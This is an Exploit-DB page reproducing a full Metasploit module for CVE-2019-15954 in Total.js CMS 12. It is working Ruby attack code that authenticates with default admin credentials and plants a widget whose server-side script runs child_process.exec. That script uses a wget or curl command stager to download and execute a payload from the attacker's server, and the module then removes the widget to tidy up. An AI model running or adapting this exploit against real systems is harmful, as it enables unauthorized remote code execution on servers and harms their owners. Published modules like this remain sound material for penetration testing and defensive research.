Total.js CMS 12 – Widget JavaScript Code Injection (Metasploit)

  • 作者: Metasploit
    日期: 2019-10-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47531/
  • ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
    
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::EXE
    include Msf::Exploit::CmdStager
    
    # Declares the module metadata (name, description, authors, targets,
    # references, defaults, notes) and registers the module's options.
    #
    # @param info [Hash] caller-supplied metadata; it is combined with the values
    #   below through update_info and the result is handed to super
    def initialize(info={})
    super(update_info(info,
    'Name' => 'Total.js CMS 12 Widget JavaScript Code Injection',
    'Description'=> %q{
    This module exploits a vulnerability in Total.js CMS. The issue is that a user with
    admin permission can embed a malicious JavaScript payload in a widget, which is
    evaluated server side, and gain remote code execution.
    },
    'License'=> MSF_LICENSE,
    'Author' =>
    [
    'Riccardo Krauter', # Original discovery
    'sinn3r'# Metasploit module
    ],
    'Arch' => [ARCH_X86, ARCH_X64],
    # Each target pins its platform and the command stager flavor:
    # wget for the Linux target, curl for the Mac target.
    'Targets'=>
    [
    [ 'Total.js CMS on Linux', { 'Platform' => 'linux', 'CmdStagerFlavor' => 'wget'} ],
    [ 'Total.js CMS on Mac', { 'Platform' => 'osx', 'CmdStagerFlavor' => 'curl' } ]
    ],
    'References' =>
    [
    ['CVE', '2019-15954'],
    ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/5'],
    ['URL', 'https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf']
    ],
    # RPORT defaults to 8000 for this module.
    'DefaultOptions' =>
    {
    'RPORT' => 8000,
    },
    'Notes'=>
    {
    'SideEffects' => [ IOC_IN_LOGS ],
    'Reliability' => [ REPEATABLE_SESSION ],
    'Stability' => [ CRASH_SAFE ]
    },
    'Privileged' => false,
    'DisclosureDate' => '2019-08-30', # Reported to seclist
    # Index into 'Targets' above: the Linux entry is the default.
    'DefaultTarget'=> 0))
    
    # All three options are required; they default to '/', 'admin' and 'admin'.
    # TOTALJSUSERNAME / TOTALJSPASSWORD are the credentials read by #exploit.
    register_options(
    [
    OptString.new('TARGETURI', [true, 'The base path for Total.js CMS', '/']),
    OptString.new('TOTALJSUSERNAME', [true, 'The username for Total.js admin', 'admin']),
    OptString.new('TOTALJSPASSWORD', [true, 'The password for Total.js admin', 'admin'])
    ])
    end
    
    # Wraps the value of the "__admin" cookie extracted from a cookie string.
    class AdminToken
      # @return [String, nil] the cookie value, or nil when no "__admin=...;"
      #   pair made of letters and digits was present
      attr_reader :token

      # @param cookie [String] cookie text to search; only the first
      #   "__admin=<alphanumerics>;" occurrence is used
      def initialize(cookie)
        @token = cookie[/__admin=([a-zA-Z\d]+);/, 1]
      end

      # @return [Boolean] whether no usable token was extracted
      def blank?
        @token.blank?
      end
    end
    
    # Describes the widget that gets planted on the CMS: a random name, a fixed
    # category, and a "<script total>" body that runs the command stager through
    # Node's child_process.exec.
    class Widget
      attr_reader :name, :category, :source_code, :platform, :url

      # @param p [Object] platform value, stored as-is in #platform
      # @param u [String] payload URL, stored as-is in #url
      # @param stager [String] shell command line executed by the widget body
      def initialize(p, u, stager)
        @name = "p_#{Rex::Text.rand_text_alpha(10)}"
        @category = 'content'
        @platform = p
        @url = u

        # The command ends up inside a double-quoted JavaScript string literal.
        # Escape backslashes and double quotes so they reach the shell verbatim
        # instead of terminating or altering the literal. Commands without those
        # characters produce exactly the same body as before.
        js_stager = stager.to_s.gsub(/[\\"]/) { |ch| "\\#{ch}" }

        @source_code = [
          '<script total>',
          "global.process.mainModule.require('child_process')",
          ".exec(\"sleep 2;#{js_stager}\");",
          '</script>'
        ].join
      end
    end
    
    # Fingerprints the target by requesting the admin widgets page.
    #
    # @return CheckCode::Unknown when no response arrives,
    #   CheckCode::Appears when the page title reports a CMS version <= 12,
    #   CheckCode::Detected when only the "X-Powered-By: Total.js" header is
    #   available, and CheckCode::Safe otherwise
    def check
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'admin', 'widgets')
      })

      unless res
        vprint_error('Connection timed out')
        return CheckCode::Unknown
      end

      # If the admin's login page is visited too many times, we will start getting
      # a 401 (unauthorized) response. In that case, we only have a header to work
      # with.
      powered_by_totaljs = res.headers['X-Powered-By'].to_s == 'Total.js'
      code = powered_by_totaljs ? CheckCode::Detected : CheckCode::Safe

      # If we are here, then that means we can still see the login page.
      # Let's see if we can extract a version.
      element = res.get_html_document.at('title')
      return code unless element.respond_to?(:text)

      # Capture only a well-formed dotted number. A looser character class would
      # also grab strings such as "12." or ".", which Gem::Version rejects with
      # an ArgumentError and would abort the check.
      raw_version = element.text[/CMS v(\d+(?:\.\d+)*)/, 1]
      return code unless raw_version

      # If we are able to check the version, we could try the default cred and
      # attempt to execute malicious code and see how the application responds.
      # However, this seems to be a bit too aggressive, so that is left to the
      # exploit part.
      return CheckCode::Appears if Gem::Version.new(raw_version) <= Gem::Version.new('12')

      CheckCode::Safe
    end
    
    # Logs in to the admin API and captures the resulting admin cookie.
    #
    # On success the token is also stored in @admin_token so that the cleanup
    # path (get_admin_token) can reuse it.
    #
    # @param user [String] admin user name, sent as "name" in the JSON body
    # @param pass [String] admin password, sent as "password" in the JSON body
    # @return [AdminToken] token built from the response cookies
    # @raise via fail_with: Failure::Unknown when no response arrives,
    #   Failure::NoAccess when the reply is not a Hash carrying 'success'
    def auth(user, pass)
      res = send_request_cgi({
        'method' => 'POST',
        # Use the path component, as every other request in this module does,
        # rather than stringifying the whole target URI object.
        'uri' => normalize_uri(target_uri.path, 'api', 'login', 'admin'),
        'ctype' => 'application/json',
        'data' => { 'name' => user, 'password' => pass }.to_json
      })

      fail_with(Failure::Unknown, 'Connection timed out') unless res

      json_res = res.get_json_document
      # If it's an array it could be an error, so we are specifically looking for a hash.
      unless json_res.kind_of?(Hash) && json_res['success']
        fail_with(Failure::NoAccess, 'Invalid username or password')
      end

      @admin_token = AdminToken.new(res.get_cookies)
      @admin_token
    end
    
    # Builds a Widget whose body runs the command stager and uploads it through
    # the admin widgets API.
    #
    # @param admin_token [AdminToken] token sent as the "__admin" cookie
    # @return [Widget] the widget that was submitted
    # @raise via fail_with (Failure::Unknown) when no response arrives or the
    #   reply is not a Hash carrying 'success'
    def create_widget(admin_token)
      platform = target.platform.names.first

      # A wildcard SRVHOST cannot be fetched from, so substitute a concrete
      # source address in that case.
      srvhost = datastore['SRVHOST']
      host = srvhost == '0.0.0.0' ? Rex::Socket::source_address : srvhost
      port = datastore['SRVPORT']
      proto = datastore['SSL'] ? 'https' : 'http'

      payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"
      resource_path = "#{get_resource}/#{payload_name}"
      url = "#{proto}://#{host}:#{port}#{resource_path}"

      stager_lines = generate_cmdstager(
        'Path' => resource_path,
        'temp' => '/tmp',
        'file' => payload_name
      )
      widget = Widget.new(platform, url, stager_lines.join(';'))

      res = send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
        'cookie' => "__admin=#{admin_token.token}",
        'ctype' => 'application/json',
        'data' => {
          'name' => widget.name,
          'category' => widget.category,
          'body' => widget.source_code
        }.to_json
      })

      fail_with(Failure::Unknown, 'Connection timed out') unless res

      res_json = res.get_json_document
      unless res_json.kind_of?(Hash) && res_json['success']
        fail_with(Failure::Unknown, 'No success message in body')
      end

      print_good("Widget created successfully")
      widget
    end
    
    # Looks up the list entry of the widget planted by this module.
    #
    # The entry is matched on the exact widget name rather than on any name
    # containing "p_", so unrelated widgets (e.g. "top_menu") are never picked.
    #
    # @param admin_token [AdminToken] token sent as the "__admin" cookie
    # @param widget [Widget] the widget to find; only its name is used
    # @return [Hash, Array] the matching item, or an empty Array when no item
    #   carries the widget's name
    # @raise via fail_with (Failure::Unknown) when no response arrives or the
    #   reply lacks the 'count' or 'items' keys
    def get_widget_item(admin_token, widget)
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
        'cookie' => "__admin=#{admin_token.token}",
        'ctype' => 'application/json'
      })

      fail_with(Failure::Unknown, 'Connection timed out') unless res

      # A non-Hash reply (such as an error array) is treated as a body without
      # the expected keys instead of blowing up on the key lookups below.
      res_json = res.get_json_document
      res_json = {} unless res_json.kind_of?(Hash)

      fail_with(Failure::Unknown, 'No count key found in body') unless res_json['count']

      items = res_json['items']
      fail_with(Failure::Unknown, 'No items key found in body') unless items

      items.find { |item| item['name'] == widget.name } || []
    end
    
    # Removes the planted widget from the CMS through the admin widgets API.
    #
    # Uses the token and widget remembered by get_admin_token / get_widget. When
    # the widget cannot be found in the list, a warning is printed and nothing
    # is deleted.
    #
    # @return [void]
    # @raise via fail_with (Failure::Unknown) when the DELETE request gets no
    #   response or the reply is not a Hash carrying 'success'
    def clear_widget
      admin_token = get_admin_token
      widget = get_widget

      print_status('Finding the payload from the widget list...')
      item = get_widget_item(admin_token, widget)

      # get_widget_item answers with an empty Array when nothing matched;
      # indexing that with a String key would raise a TypeError.
      if item.nil? || item.empty?
        print_warning('Widget not found in the widget list, nothing to clear')
        return
      end

      json_body = {
        'id' => item['id'],
        'picture' => item['picture'],
        'name' => item['name'],
        'icon' => item['icon'],
        'category' => item['category'],
        'datecreated' => item['datecreated'],
        'reference' => item['reference']
      }.to_json

      res = send_request_cgi({
        'method' => 'DELETE',
        'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
        'cookie' => "__admin=#{admin_token.token}",
        'ctype' => 'application/json',
        'data' => json_body
      })

      fail_with(Failure::Unknown, 'Connection timed out') unless res

      res_json = res.get_json_document
      unless res_json.kind_of?(Hash) && res_json['success']
        fail_with(Failure::Unknown, 'No success message in body')
      end

      print_good("Widget cleared successfully")
    end
    
    # HTTP handler for the payload server: serves the payload executable for
    # any URI containing "p_" followed by at least one character, and answers
    # every other request with a not-found response.
    #
    # @param cli [Object] client connection; its peerhost is logged
    # @param req [Object] incoming request; its uri selects the response
    # @return [nil, Object] nil after serving the payload, otherwise whatever
    #   send_not_found returns
    def on_request_uri(cli, req)
      print_status("#{cli.peerhost} requesting: #{req.uri}")

      return send_not_found(cli) unless req.uri =~ /p_.+/

      exe = generate_payload_exe(code: payload.encoded)
      print_status("Sending payload to #{cli.peerhost}")
      send_response(cli, exe, { 'Content-Type' => 'application/octet-stream' })
      nil
    end
    
    # Session hook: removes the planted widget by delegating to clear_widget.
    # The session argument itself is not used here.
    # NOTE(review): presumably invoked by the framework once a session opens;
    # confirm against the exploit base class.
    def on_new_session(session)
    clear_widget
    end
    
    # Returns the widget stored in @widget (assigned by #exploit). This exists
    # for cleaning up the widget, because the widget cannot be passed as an
    # argument to on_new_session.
    def get_widget
    @widget
    end
    
    # Returns the admin token stored in @admin_token (assigned by #auth). This
    # also exists for cleaning up the widget, because the token cannot be passed
    # to the cleanup code as an argument directly.
    def get_admin_token
    @admin_token
    end
    
    # Entry point of the exploit: authenticates with the configured admin
    # credentials, plants the malicious widget, then hands control to the
    # parent implementation through super.
    #
    # The created widget is kept in @widget so the cleanup path can find it.
    #
    # @raise via fail_with (Failure::Unknown) when authentication yields a
    #   blank admin token; auth and create_widget may fail on their own terms
    def exploit
      user = datastore['TOTALJSUSERNAME']
      pass = datastore['TOTALJSPASSWORD']

      print_status("Attempting to authenticate with #{user}:#{pass}")
      admin_token = auth(user, pass)
      fail_with(Failure::Unknown, 'No admin token found') if admin_token.blank?
      print_good("Authenticated as: #{user}:#{pass}")

      print_status("Creating a widget...")
      @widget = create_widget(admin_token)
      super
    end
    
    end